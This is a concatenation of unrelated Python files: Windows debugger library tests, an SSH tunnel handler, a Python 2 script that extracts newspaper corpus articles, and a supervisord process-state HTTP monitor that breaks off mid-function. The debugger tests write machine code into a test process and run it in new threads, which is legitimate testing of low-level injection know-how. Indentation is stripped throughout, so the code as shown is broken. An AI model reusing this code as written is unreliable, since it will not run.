# TEST_CASE.assertNotEqual(t.context.Dr7, 0)
if TSTBP.COUNTER == 0: #First time we got it ! create new thread
TSTBP.COUNTER = 1
dbg.current_process.create_thread(addr, 0)
else:
TSTBP.COUNTER += 1
d.current_process.exit()
d = MyDbg(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 2 + "\xc3")
d.add_bp(TSTBP(addr, 0))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verify we actually called the Breakpoints
assert TSTBP.COUNTER == 2
@pytest.mark.parametrize("bptype", [windows.debug.Breakpoint, windows.debug.HXBreakpoint])
def test_simple_breakpoint_name_addr(proc32_64_debug, bptype):
"""Check breakpoint address resolution for format dll!api"""
class TSTBP(bptype):
COUNTER = 0
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
LdrLoadDlladdr = dbg.current_process.peb.modules[1].pe.exports["LdrLoadDll"]
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == addr
assert LdrLoadDlladdr == addr
TSTBP.COUNTER += 1
d.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP("ntdll!LdrLoadDll"))
d.loop()
assert TSTBP.COUNTER == 1
import dbg_injection
def test_hardware_breakpoint_name_addr(proc32_64_debug):
"""Check that name addr in HXBP are trigger in all threads"""
class TSTBP(windows.debug.HXBreakpoint):
COUNTER = 0
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == dbg._resolve(self.addr, dbg.current_process)
TSTBP.COUNTER += 1
if TSTBP.COUNTER == 1:
# Perform a loaddll in a new thread :)
# See if it triggers a bp
t = dbg_injection.perform_manual_getproc_loadlib_for_dbg(dbg.current_process, "wintrust.dll")
self.new_thread = t
if hasattr(self, "new_thread") and dbg.current_thread.tid == self.new_thread.tid:
for t in dbg.current_process.threads:
assert t.context.Dr7 != 0
d.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP("ntdll!LdrLoadDll"))
# Code that will load wintrust !
d.loop()
def test_single_step(proc32_64_debug):
"""Check that BP/dbg can trigger single step and that instruction follows"""
NB_SINGLE_STEP = 3
class MyDbg(windows.debug.Debugger):
DATA = []
def on_single_step(self, exception):
# Record each single-step address and keep stepping until NB_SINGLE_STEP addresses are collected
addr = exception.ExceptionRecord.ExceptionAddress
assert self.current_thread.context.pc == addr
if len(MyDbg.DATA) < NB_SINGLE_STEP:
MyDbg.DATA.append(addr)
return self.single_step()
self.current_process.exit()
return
class TSTBP(windows.debug.Breakpoint):
"""Check that BP/dbg can trigger single step and that instruction follows"""
def trigger(self, dbg, exc):
return dbg.single_step()
d = MyDbg(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 3 + "\xc3")
d.add_bp(TSTBP(addr))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verify we actually called the Breakpoints
assert len(MyDbg.DATA) == NB_SINGLE_STEP
for i in range(NB_SINGLE_STEP):
assert MyDbg.DATA[i] == addr + 1 + i
@pytest.mark.parametrize("bptype", [windows.debug.Breakpoint, windows.debug.HXBreakpoint])
def test_single_step_from_bp(proc32_64_debug, bptype):
"""Check that HXBPBP/dbg can trigger single step"""
NB_SINGLE_STEP = 3
class MyDbg(windows.debug.Debugger):
DATA = []
def on_single_step(self, exception):
# Record each single-step address and keep stepping until NB_SINGLE_STEP addresses are collected
addr = exception.ExceptionRecord.ExceptionAddress
assert self.current_thread.context.pc == addr
if len(MyDbg.DATA) < NB_SINGLE_STEP:
MyDbg.DATA.append(addr)
return self.single_step()
self.current_process.exit()
return
# class TSTBP(windows.debug.HXBreakpoint):
class TSTBP(bptype):
"""Check that BP/dbg can trigger single step and that instruction follows"""
def trigger(self, dbg, exc):
return dbg.single_step()
d = MyDbg(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 3 + "\xc3")
d.add_bp(TSTBP(addr))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verify we actually called the Breakpoints
assert len(MyDbg.DATA) == NB_SINGLE_STEP
for i in range(NB_SINGLE_STEP):
assert MyDbg.DATA[i] == addr + 1 + i
# MEMBP
def test_memory_breakpoint_write(proc32_64_debug):
"""Check MemoryBP WRITE"""
class TSTBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_READONLY
DEFAULT_EVENTS = "W"
COUNTER = 0
"""Check that BP/dbg can trigger single step and that instruction follows"""
def trigger(self, dbg, exc):
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
eax = dbg.current_thread.context.func_result # Rax | Eax
if eax == 42:
dbg.current_process.exit()
return
assert fault_addr == data + eax
TSTBP.COUNTER += 1
return
if proc32_64_debug.bitness == 32:
asm, reg = (x86, "EAX")
else:
asm, reg = (x64, "RAX")
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
data = proc32_64_debug.virtual_alloc(0x1000)
injected = asm.MultipleInstr()
injected += asm.Mov(reg, 0)
injected += asm.Mov(asm.deref(data), reg)
injected += asm.Add(reg, 4)
injected += asm.Mov(asm.deref(data + 4), reg)
injected += asm.Add(reg, 4)
# This one should NOT trigger the MemBP of size 8
injected += asm.Mov(asm.deref(data + 8), reg)
injected += asm.Mov(reg, 42)
injected += asm.Mov(asm.deref(data), reg)
injected += asm.Ret()
proc32_64_debug.write_memory(addr, injected.get_code())
d.add_bp(TSTBP(data, size=0x8))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verify the Breakpoints were called for the expected addresses
assert TSTBP.COUNTER == 2
def test_memory_breakpoint_exec(proc32_64_debug):
"""Check MemoryBP EXEC"""
NB_NOP_IN_PAGE = 3
class TSTBP(windows.debug.MemoryBreakpoint):
"""Check that BP/dbg can trigger single step and that instruction follows"""
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "X"
DATA = []
def trigger(self, dbg, exc):
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
TSTBP.DATA.append(fault_addr)
if len(TSTBP.DATA) == NB_NOP_IN_PAGE + 1:
dbg.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * NB_NOP_IN_PAGE + "\xc3")
d.add_bp(TSTBP(addr, size=0x1000))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verify we actually called the Breakpoints
assert len(TSTBP.DATA) == NB_NOP_IN_PAGE + 1
for i in range(NB_NOP_IN_PAGE + 1):
assert TSTBP.DATA[i] == addr + i
# breakpoint remove
import threading
@python_injection
@pytest.mark.parametrize("bptype", [windows.debug.FunctionParamDumpHXBP, windows.debug.FunctionParamDumpBP])
def test_standard_breakpoint_self_remove(proc32_64_debug, bptype):
data = []
def do_check():
proc32_64_debug.execute_python_unsafe("open(u'FILENAME1')").wait()
proc32_64_debug.execute_python_unsafe("open(u'FILENAME2')").wait()
proc32_64_debug.execute_python_unsafe("open(u'FILENAME3')").wait()
proc32_64_debug.exit()
class TSTBP(bptype):
TARGET = windows.winproxy.CreateFileW
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
ctx = dbg.current_thread.context
filename = self.extract_arguments(dbg.current_process, dbg.current_thread)["lpFileName"]
data.append(filename)
if filename == u"FILENAME2":
dbg.del_bp(self)
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP("kernel32!CreateFileW"))
threading.Thread(target=do_check).start()
d.loop()
assert data == [u"FILENAME1", u"FILENAME2"]
@python_injection
@pytest.mark.parametrize("bptype", [windows.debug.FunctionParamDumpHXBP, windows.debug.FunctionParamDumpBP])
def test_standard_breakpoint_remove(proc32_64_debug, bptype):
data = []
def do_check():
proc32_64_debug.execute_python_unsafe("open(u'FILENAME1')").wait()
proc32_64_debug.execute_python_unsafe("open(u'FILENAME2')").wait()
d.del_bp(the_bp)
proc32_64_debug.execute_python_unsafe("open(u'FILENAME3')").wait()
proc32_64_debug.exit()
class TSTBP(bptype):
TARGET = windows.winproxy.CreateFileW
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
ctx = dbg.current_thread.context
filename = self.extract_arguments(dbg.current_process, dbg.current_thread)["lpFileName"]
data.append(filename)
d = windows.debug.Debugger(proc32_64_debug)
the_bp = TSTBP("kernel32!CreateFileW")
d.add_bp(the_bp)
threading.Thread(target=do_check).start()
d.loop()
assert data == [u"FILENAME1", u"FILENAME2"]
def get_generate_read_at_for_proc(target):
if target.bitness == 32:
def generate_read_at(addr):
res = x86.MultipleInstr()
res += x86.Mov("EAX", x86.deref(addr))
res += x86.Ret()
return res.get_code()
else:
def generate_read_at(addr):
res = x64.MultipleInstr()
res += x64.Mov("RAX", x64.deref(addr))
res += x64.Ret()
return res.get_code()
return generate_read_at
def get_generate_write_at_for_proc(target):
if target.bitness == 32:
def generate_write_at(addr):
res = x86.MultipleInstr()
res += x86.Mov(x86.deref(addr), "EAX")
res += x86.Ret()
return res.get_code()
else:
def generate_write_at(addr):
res = x64.MultipleInstr()
res += x64.Mov(x64.deref(addr), "RAX")
res += x64.Ret()
return res.get_code()
return generate_write_at
def test_mem_breakpoint_remove(proc32_64_debug):
data = []
generate_read_at = get_generate_read_at_for_proc(proc32_64_debug)
def do_check():
proc32_64_debug.execute(generate_read_at(data_addr)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 4)).wait()
d.del_bp(the_bp)
proc32_64_debug.execute(generate_read_at(data_addr + 8)).wait()
proc32_64_debug.exit()
class TSTBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "RWX"
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
data.append(fault_addr)
d = windows.debug.Debugger(proc32_64_debug)
data_addr = proc32_64_debug.virtual_alloc(0x1000)
the_bp = TSTBP(data_addr, size=0x1000)
d.add_bp(the_bp)
threading.Thread(target=do_check).start()
d.loop()
assert data == [data_addr, data_addr + 4]
def test_mem_breakpoint_self_remove(proc32_64_debug):
data = []
generate_read_at = get_generate_read_at_for_proc(proc32_64_debug)
def do_check():
proc32_64_debug.execute(generate_read_at(data_addr)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 4)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 8)).wait()
proc32_64_debug.exit()
class TSTBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "RWX"
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
data.append(fault_addr)
if fault_addr == data_addr + 4:
dbg.del_bp(self)
d = windows.debug.Debugger(proc32_64_debug)
data_addr = proc32_64_debug.virtual_alloc(0x1000)
the_bp = TSTBP(data_addr, size=0x1000)
d.add_bp(the_bp)
threading.Thread(target=do_check).start()
d.loop()
assert data == [data_addr, data_addr + 4]
def test_read_write_bp_same_page(proc32_64_debug):
data = []
generate_read_at = get_generate_read_at_for_proc(proc32_64_debug)
generate_write_at = get_generate_write_at_for_proc(proc32_64_debug)
def do_check():
proc32_64_debug.execute(generate_read_at(data_addr)).wait()
proc32_64_debug.execute(generate_write_at(data_addr + 4)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 0x500)).wait()
proc32_64_debug.execute(generate_write_at(data_addr + 0x504)).wait()
proc32_64_debug.exit()
class MemBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "RWX"
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
#print("Got <{0:#x}> <{1}>".format(fault_addr, exc.ExceptionRecord.ExceptionInformation[0]))
data.append((self, fault_addr))
d = windows.debug.Debugger(proc32_64_debug)
data_addr = proc32_64_debug.virtual_alloc(0x1000)
the_write_bp = MemBP(data_addr + 0x500, size=0x500, events="W")
the_read_bp = MemBP(data_addr, size=0x500, events="RW")
d.add_bp(the_write_bp)
d.add_bp(the_read_bp)
threading.Thread(target=do_check).start()
d.loop()
# The read at data_addr + 0x500 must not trigger the_write_bp (it only watches "W" events)
expected_result = [(the_read_bp, data_addr), (the_read_bp, data_addr + 4),
(the_write_bp, data_addr + 0x504)]
assert data == expected_result
def test_exe_in_module_list(proc32_64_debug):
class MyDbg(windows.debug.Debugger):
def on_exception(self, exception):
exename = os.path.basename(proc32_64_debug.peb.imagepath.str)
this_process_modules = self._module_by_process[self.current_process.pid]
assert exename and exename in this_process_modules.keys()
self.current_process.exit()
d = MyDbg(proc32_64_debug)
d.loop()
def test_bp_exe_by_name(proc32_64_debug):
class TSTBP(windows.debug.Breakpoint):
COUNTER = 0
def trigger(self, dbg, exc):
TSTBP.COUNTER += 1
assert TSTBP.COUNTER == 1
# Kill the target in 0.5s
# It's not too long, but long enough for trigger to be called again if the implementation is broken
threading.Timer(0.5, proc32_64_debug.exit).start()
exepe = proc32_64_debug.peb.exe
entrypoint = exepe.get_OptionalHeader().AddressOfEntryPoint
exename = os.path.basename(proc32_64_debug.peb.imagepath.str)
d = windows.debug.Debugger(proc32_64_debug)
# The goal is to test bp of format 'exename!offset' so we craft a string based on the entrypoint
d.add_bp(TSTBP("{name}!{offset}".format(name=exename, offset=entrypoint)))
d.loop()
assert TSTBP.COUNTER == 1
|
handler.py
|
# -*- coding: utf-8 -*-
"""
proxy.py
~~~~~~~~
⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
Network monitoring, controls & Application development, testing, debugging.
:copyright: (c) 2013-present by Abhinav Singh and contributors.
:license: BSD, see LICENSE for more details.
"""
import argparse
from typing import TYPE_CHECKING
import socket
import logging
import select
import threading
logger = logging.getLogger(__name__)
if TYPE_CHECKING: # pragma: no cover
from ...common.types import HostPort
try:
from paramiko.channel import Channel
except ImportError:
pass
class SshHttpProtocolHandler:
"""Handles incoming connections over forwarded SSH transport."""
def __init__(self, flags: argparse.Namespace) -> None:
self.flags = flags
def tunnel_forward_worker(self, chan):
host, port = '127.0.0.1', self.flags.port
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
logger.info("Forwarding request to %s:%d failed: %r" % (host, port, e))
return
logger.info(
"Connected! Tunnel open %r -> %r -> %r"
% (chan.origin_addr, chan.getpeername(), (host, port))
)
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
logger.info("Tunnel closed from %r" % (chan.origin_addr,))
def on_connection(
self,
chan: 'Channel',
origin: 'HostPort',
server: 'HostPort',
) -> None:
thr = threading.Thread(
target=self.tunnel_forward_worker, args=(chan,)
)
thr.setDaemon(True)
thr.start()
|
select_nyt.py
|
#!/usr/bin/env python
from nltk.corpus.reader import XMLCorpusReader
import os
import sys
from collections import defaultdict
#from multiprocessing import Process, Queue, cpu_count
### Functions to create extractors ###
def make_filter_extractor(base_extractor, reject_cond, feature_name,
allow_blank):
def extractor(elt):
contents = base_extractor(elt)
if contents is None or not reject_cond(contents):
return contents
else:
if allow_blank:
return None
else:
raise ValueError(feature_name)
return extractor
def make_attr_extractor(attr_name):
return lambda elt: elt.get(attr_name)
def make_class_text_extractor(class_name):
def text_if_online_class(elt):
if elt.get('class') != class_name:
return None
return elt.text
return text_if_online_class
def make_body_extractor(kicker):
if len(kicker) == 0:
return lambda elt: '\n\n'.join([c.text for c in elt.getchildren()])
else:
kicker = kicker.__iter__().next()
def extractor(elt):
pars = [c.text for c in elt.getchildren()]
if pars[-1].strip() == kicker:
pars.pop()
return '\n\n'.join(pars)
return extractor
### Global extractors ###
text_extractor = lambda elt: elt.text
content_extractor = make_attr_extractor('content')
docid_extractor = make_attr_extractor('id-string')
kicker_extractor = make_attr_extractor('series.name')
indexing_extractor = make_class_text_extractor('indexing_service')
online_section_extractor = make_filter_extractor(
lambda elt: [sec.strip() for sec in elt.get('content').split(';')],
lambda sections: (('Washington' not in sections)
or 'Corrections' in sections),
'online_section', False)
descriptor_extractor = make_filter_extractor(
indexing_extractor, lambda contents: contents.startswith("NO INDEX TERMS"),
"descriptor", True)
mat_type_extractor = make_filter_extractor(
text_extractor, lambda contents: contents in (
"Summary", "List", "Paid Death Notice", "Paid Memorial Notice"),
"material_type", False)
### Generic functions for running extractors on the document and handling the results ###
def extract_feature(doc, xpath, extractor=text_extractor):
result = set()
elts = doc.findall(xpath)
for elt in elts:
extracted = extractor(elt)
if extracted is None:
continue
# Extractor can return multiple items. If it did, add them all.
if hasattr(extracted, '__iter__'):
result.update(extracted)
else:
result.add(extracted)
return result
def extract_taxonomies(doc):
tax_classes = doc.findall(
'.//head/docdata/identified-content/classifier'
'[@type="taxonomic_classifier"]')
unique_classes = set()
# Shave off first 4 chars, because they'll just be "Top/"
tax_classes = [c.text[4:] for c in tax_classes]
for tax_class in tax_classes:
classes_to_del = set()
add_to_unique = True
for c in unique_classes:
if c.startswith(tax_class):
add_to_unique = False
break # tax_class is the same as or a prefix of something we've seen already -- ignore it
elif tax_class.startswith(c):
# c is a prefix of this next class, so we should delete c later
classes_to_del.add(c)
unique_classes = unique_classes - classes_to_del
if add_to_unique:
unique_classes.add(tax_class)
return unique_classes
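# Worked example (added for clarity): for the classifiers
#   Top/News, Top/News/U.S., Top/News/U.S./Politics
# only "News/U.S./Politics" survives, because after the leading "Top/" is shaved
# off, any class that is a prefix of a more specific class gets dropped.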
def add_features(name, doc_dict, values, max_allowed=1, required=True):
if len(values) > max_allowed:
raise ValueError(name)
elif len(values) == 0:
if required:
raise ValueError(name)
for i, value in enumerate(values):
doc_dict[name + ("_%d" % i)] = value
for i in range(len(values), max_allowed):
doc_dict[name + ("_%d" % i)] = ''
### Driver ###
sections = set()
def process_doc(doc):
doc_dict = {}
'''
add_features('doc_id', doc_dict,
extract_feature(doc, './/head/docdata/doc-id', docid_extractor))
add_features('headline', doc_dict,
extract_feature(doc, './/body[1]/body.head/hedline/hl1'))
add_features('publication_year', doc_dict,
extract_feature(doc, './/head/meta[@name="publication_year"]', content_extractor))
add_features('publication_month', doc_dict,
extract_feature(doc, './/head/meta[@name="publication_month"]', content_extractor))
add_features('taxonomic_labels', doc_dict, extract_taxonomies(doc), 9)
'''
kicker = extract_feature(doc, './/head/docdata/series', kicker_extractor)
add_features('body', doc_dict,
extract_feature(doc, './/body/body.content/block[@class="full_text"]',
make_body_extractor(kicker)))
add_features('material_type', doc_dict,
extract_feature(doc, './/head/docdata/identified-content/classifier[@type="types_of_material"]',
mat_type_extractor),
4, False)
#add_features('day_of_week', doc_dict,
# extract_feature(doc, './/head/meta[@name="publication_day_of_week"]', content_extractor))
#add_features('descriptor', doc_dict,
# extract_feature(doc, './/head/docdata/identified-content/classifier[@type="descriptor"]',
# descriptor_extractor),
# 8, False)
#add_features('general_descriptor', doc_dict,
# extract_feature(doc, './/head/docdata/identified-content/classifier[@type="general_descriptor"]'),
# 10, False)
#add_features('news_desk', doc_dict,
# extract_feature(doc, './/head/meta[@name="dsk"]', content_extractor))
add_features('online_section', doc_dict,
extract_feature(doc, './/head/meta[@name="online_sections"]',
online_section_extractor),
4)
sections.update([doc_dict[x] for x in doc_dict if x.startswith('online_section')])
#add_features('print_section', doc_dict,
# extract_feature(doc, './/head/meta[@name="print_section"]', content_extractor))
#add_features('print_section', doc_dict,
# extract_feature(doc, './/head/meta[@name="print_section"]', content_extractor))
#add_features('kicker', doc_dict, kicker, required=False)
return doc_dict
def doc_path_to_dict(path):
directory, fname = os.path.split(path)
reader = XMLCorpusReader(directory, fname)
doc = reader.xml()
try:
return process_doc(doc)
except ValueError, e:
return e.args[0]
def worker(input, output):
for path in iter(input.get, 'STOP'):
output.put((path, doc_path_to_dict(path)))
def main(argv):
root_path = argv[1]
target_path = argv[2] if len(argv) > 2 else None
file_paths = []
for dirpath, _dirs, files in os.walk(root_path, topdown=False):
file_paths.extend([os.path.join(dirpath, filename) for filename in files
if filename.endswith('.xml')])
num_paths = len(file_paths)
print "Found", num_paths, "files"
skipped = defaultdict(int)
class Dummy(object): pass
num_done = Dummy()
num_done.val = 0
def handle_result(path, doc_dict):
if isinstance(doc_dict, str):
skipped[doc_dict] += 1
else:
dir_path, filename = os.path.split(path)
if target_path:
dir_path = target_path
path_base = os.path.join(dir_path, os.path.splitext(filename)[0])
with open(path_base + '.txt', 'w') as txt_file:
txt_file.write(doc_dict['body_0'].encode('utf-8'))
open(path_base + '.ann', 'a').close() # create empty .ann file
num_done.val += 1
sys.stdout.write('\r%d / %d' % (num_done.val, num_paths))
'''
path_q = Queue()
result_q = Queue()
for i in range(cpu_count()):
Process(target=worker, args=(path_q, result_q)).start()
for path in file_paths:
path_q.put(path)
path_q.put('STOP')
while not path_q.empty() or not result_q.empty():
handle_result(*result_q.get())
'''
for path in file_paths:
handle_result(path, doc_path_to_dict(path))
sys.stdout.write("\n")
print sections
print "Skipped:", dict(skipped)
print "Total skipped:", sum(skipped.values())
if __name__ == '__main__':
main(sys.argv)
|
process-state.py
|
#!/usr/bin/env python
# Copyright (c) 2019 AT&T Intellectual Property.
# Copyright (c) 2019 Nokia.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# This script implements a supervisor event listener that follows the process states.
# The main parent process follows the events from the supervised daemons while a child
# process provides the process status info via an HTTP server interface.
# When any process state changes to PROCESS_STATE_FATAL, the HTTP server responds with
# status code 500 to indicate faulty operation; the normal status code is 200 (working).
# Add the script configuration to supervisord.conf as follows:
#
# [eventlistener:process-state]
# command=python process-state.py
# autorestart=true
# startretries=3
# events=PROCESS_STATE
#
# The following is an example supervisor event as received for a process state change.
#
# ver:3.0 server:supervisor serial:16 pool:process-state poolserial:16 eventname:PROCESS_STATE_FATAL len:62
# processname:sleep-exit groupname:sleep-exit from_state:BACKOFF
#
# Process states are: PROCESS_STATE_STARTING, PROCESS_STATE_RUNNING, PROCESS_STATE_STOPPING,
# PROCESS_STATE_STOPPED, PROCESS_STATE_BACKOFF, PROCESS_STATE_FATAL
#
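# For reference (derived from the main loop below), one handshake with supervisord
# looks like:
#   listener -> supervisord:  "READY\n"
#   supervisord -> listener:  one header line (eventname, len, ...) followed by 'len' bytes of payload
#   listener -> supervisord:  "RESULT 2\nOK"
#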
import os
import sys
import signal
import datetime
import argparse
import psutil
import threading
import BaseHTTPServer
# needed as a workaround for the python socket library broken pipe issue
from multiprocessing import Process, Manager, Value, Lock
global HTTP_STATUS
global PROCESS_STATE
global DEBUG
TABLE_STYLE = ('<style>'
'div { font-family: Arial, Helvetica, sans-serif; font-size:8px;}'
'p { font-family: Arial, Helvetica, sans-serif;}'
'h1 { font-family: Arial, Helvetica, sans-serif; font-size:30px; font-weight: bold; color:#A63434;}'
'table, th, td { border: 1px solid black; border-collapse: collapse; font-size:12px;}'
'th, td { padding: 3px 10px 3px 10px; text-align: left;}'
'th.thr, td.tdr { padding: 3px 10px 3px 10px; text-align: right;}'
'th.thc, td.tdc { padding: 3px 10px 3px 10px; text-align: center;}'
'table#t1 tr:nth-child(even) { background-color: #eee;}'
'table#t1 tr:nth-child(odd) { background-color: #ADC0DC;}'
'table#t1 th { background-color: #214D8B; color: white;}</style>')
def get_pid_info(pid):
pdata = None
if pid != 0:
try:
process = psutil.Process(pid)
# these are the item lists
files = process.open_files()
# get the open files and connections, then count the number of 'fd=' entries in both
sockets = process.connections()
descriptors = str(files)+str(sockets)
count = descriptors.count("fd=")
pdata = {"pid": process.pid,
"status": process.status(),
"cpu": process.cpu_percent(interval=0.2),
"descriptors": count,
"memory": process.memory_info().rss}
except (psutil.ZombieProcess, psutil.AccessDenied, psutil.NoSuchProcess):
pdata = None
return pdata
def get_process_html_info():
global PROCESS_STATE
try:
html_data = ("<table width='800px' id='t1'>"
"<thead><tr><th>Process</th><th>Date and time</th><th>From state</th><th>to state</th>"
"<th class=thc>Pid</th><th class=thc>Fds</th><th class=thc>Mem</th><th class=thc>Cpu</th></tr></thead><tbody>")
for proc,data in PROCESS_STATE.items():
pid = 0
descriptors = ""
memory_usage = ""
cpu_usage = ""
if data['pid'] is not None:
pdata = get_pid_info(data['pid'])
if pdata is not None:
pid = pdata['pid']
descriptors = str(pdata['descriptors'])
memory_usage = str(pdata['memory']/1024)+" Kb"
cpu_usage = str(pdata['cpu'])+" %"
html_data += ('<tr>'
'<td>'+str(proc)+'</td>'
'<td>'+str(data['time'])+'</td>'
'<td>'+str(data['from_state'])+'</td>'
'<td>'+str(data['state'])+'</td>'
'<td class=tdr>'+str(pid)+'</td>'
'<td class=tdr>'+descriptors+'</td>'
'<td class=tdr>'+memory_usage+'</td>'
'<td class=tdr>'+cpu_usage+'</td>'
'</tr>')
finally:
html_data += ("</tbody></table>")
return html_data
# responds to http request according to the process status
class myHTTPHandler(BaseHTTPServer.BaseHTTPRequestHandler):
global HTTP_STATUS
global REFRESH_TIME
global PROCESS_STATE
# write HEAD and GET to client and then close
def do_HEAD(s):
s.send_response(HTTP_STATUS['code'])
s.send_header("Server-name", "supervisor-process-stalker 1.0")
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.close()
def do_GET(s):
try:
"""Respond to a GET request."""
s.send_response(HTTP_STATUS['code'])
s.send_header("Server-name", "supervisor-process-stalker 1.0")
s.send_header("Content-type", "text/html")
s.end_headers()
html_data = ("<html><head><title>supervisor process event handler</title>"+TABLE_STYLE+
"<meta http-equiv='refresh' content='"+str(REFRESH_TIME)+"'/></head>"
"<body><h1>Supervisor Process Event Handler</h1>"
"<div><table width='800px' id='t1'><tr><td>Status code: "+str(HTTP_STATUS['code'])+"</td></tr></table></div>"
"<p> </p>")
s.wfile.write(html_data)
html = get_process_html_info()
s.wfile.write(html)
s.wfile.write("</body></html>")
s.wfile.close()
except (IOError):
pass
# make processing silent - otherwise will mess up the event handler
def log_message(self, format, *args):
return
def HTTPServerProcess(address, port, http_status, process_state):
global HTTP_STATUS
global PROCESS_STATE
# copy the process status global variable
PROCESS_STATE = process_state
HTTP_STATUS = http_status
server = BaseHTTPServer.HTTPServer
try:
# redirect stdout to stderr so that the HTTP server won't kill the supervised STDIN/STDOUT interface
sys.stdout = sys.stderr
# Create a web server and define the handler to manage the
# incoming request
server = server((address, port), myHTTPHandler)
# Wait forever for incoming http requests
server.serve_forever()
except KeyboardInterrupt:
write_stderr('^C received, shutting down the web server')
server.socket.close()
def dict_print(d):
for proc,data in d.items():
write_stderr(str(proc))
for key,val in data.items():
write_stderr(str(key)+' is '+str(val))
# default output helpers: stdout is reserved for the supervisor eventlistener protocol
def write_stdout(s):
# only eventlistener protocol messages may be sent to stdout
sys.stdout.write(s)
sys.stdout.flush()
def write_stderr(s):
global DEBUG
# this can be used for debug logging - stdout not allowed
sys.stderr.write(s)
sys.stderr.flush()
def main():
global REFRESH_TIME
global DEBUG
manager = Manager()
# stores the process status info
PROCESS_STATE = manager.dict()
#HTTP_STATUS_CODE = Value('d', True)
HTTP_STATUS = manager.dict()
HTTP_STATUS['code'] = 200
write_stderr("HTTP STATUS SET TO "+str(HTTP_STATUS['code']))
# default http meta key refresh time in seconds
REFRESH_TIME = 3
# init the default values
ADDRESS = "0.0.0.0" # bind to all interfaces
PORT = 3000 # web server listen port
DEBUG = False # no logging
parser = argparse.ArgumentParser()
parser.add_argument('--port', dest='port', help='HTTP server listen port, default 3000', required=False, type=int)
parser.add_argument('--debug', dest='debug', help='sets the debug mode for logging', required=False, action='store_true')
parser.add_argument('--address', dest='address', help='IP listen address (e.g. 172.16.0.3), default all interfaces', required=False, type=str)
parser.add_argument('--refresh', dest='refresh', help='HTTP auto refresh time in second default is 3 seconds', required=False, type=int)
args = parser.parse_args()
if args.port is not None:
PORT = args.port
if args.address is not None:
ADDRESS = args.address
if args.debug is not False:
        DEBUG = True
# Start the http server, bind to address
httpServer = Process(target=HTTPServerProcess, args=(ADDRESS, PORT, HTTP_STATUS, PROCESS_STATE))
httpServer.start()
# set the signal handler this phase
signal.signal(signal.SIGQUIT, doExit)
signal.signal(signal.SIGTERM, doExit)
signal.signal(signal.SIGINT, doExit)
signal.signal(signal.SIGCLD, doExit)
while httpServer.is_alive():
# transition from ACKNOWLEDGED to READY
write_stdout('READY\n')
# read header line and print it to stderr
line = sys.stdin.readline()
write_stderr(line)
# read event payload and print it to stderr
headers = dict([ x.split(':') for x in line.split() ])
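        # the supervisor eventlistener header is a space-separated list of key:value tokens, e.g.
        #   ver:3.0 server:supervisor serial:21 pool:listener poolserial:10 eventname:PROCESS_STATE_RUNNING len:54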
process_state = headers['eventname']
if process_state == 'PROCESS_STATE_FATAL':
write_stderr('Status changed to FATAL')
HTTP_STATUS['code'] = 500
short_state = process_state.replace('PROCESS_STATE_', '')
length = int(headers['len'])
data = sys.stdin.read(length)
write_stderr(data)
process = dict([ x.split(':') for x in data.split() ])
pid = 0
if 'pid' in process:
pid = int(process['pid'])
now = datetime.datetime.now()
